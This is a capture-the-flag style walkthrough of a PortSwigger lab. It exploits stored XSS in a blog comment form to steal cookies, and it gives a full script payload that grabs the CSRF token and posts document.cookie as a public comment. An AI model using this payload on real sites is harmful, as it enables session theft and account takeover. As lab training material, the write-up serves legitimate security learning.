So in this challenge, we are going to implement exploitation on user cookies using XSS Attack. We got another example of Blog Site where they allow user to give comment on posts:
If we try to attempt XSS using <script>
tag, then we able to perform XSS, it means that we can just insert our payload normally inside the <script>
tag.
Now let's create a payload where we able to get user cookies, What we able to do is:
- Send the user cookies to a webhook or our site that collects user cookies
- Show the cookies in the comment box
I tried the first solution but the result was not as what i expected, i only got a session but not the cookies we need to gain access since it was a third party and Portwigger didn't allow us to use third party app, so i tried the second solution, I create a payload that force user to request post a comment to a blog, you can find the right endpoint and needed data using intercept in BurpSuite. To post a comment, we need to get their CSRF Token, we can find it in the <input>
tag attribute.
This is my final payload:
<script>
window.onload = function(){
const Token = document.getElementsByTagName('input')[0].value
var data = 'csrf='+Token +'&'
data += 'postId=10&'
data += 'comment='+document.cookie+'&'
data += 'name=DjumantotheAdmin&'
data += 'email=roc@chic.com&'
data += 'website=https://google.com'
fetch('https://0a4500e6034e583480d12b22009f0070.web-security-academy.net/post/comment',
{
method: 'POST',
mode: 'no-cors',
body: data
}
)
};
</script>
So here's how the code works:
- We want to run it right where the content is loaded using
window.onload()
function - We take their CSRF Token from the input tag
- We set the comment using their cookies
- We set the postId value using current blog value which is 10
And this is the result: